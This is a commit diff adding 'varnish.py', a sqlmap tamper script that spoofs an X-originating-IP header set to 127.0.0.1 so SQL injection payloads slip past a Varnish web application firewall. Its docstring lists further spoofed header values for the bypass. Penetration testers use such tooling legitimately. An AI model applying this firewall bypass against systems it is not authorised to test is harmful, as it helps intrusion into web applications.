Update for an Issue #760

2025-12-09 14:11:29 +00:00 · 2014-07-10 08:49:20 +02:00
parent 33b6d189cd
commit 32af0b17b0
2 changed files with 36 additions and 5 deletions
--- a/tamper/varnish.py
+++ b/tamper/varnish.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Append a HTTP Request Parameter to ByPass
+    WAF Protection of Varnish Firewall.
+
+    You can tamper with different Parameters, like:
+    >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
+    >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
+    >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
+    >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
+    >> X-remote-IP: * or %00 or %0A
+
+        http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
+
+    """
+
+    headers = kwargs.get("headers", {})
+    headers["X-originating-IP"] = "127.0.0.1"
+    return payload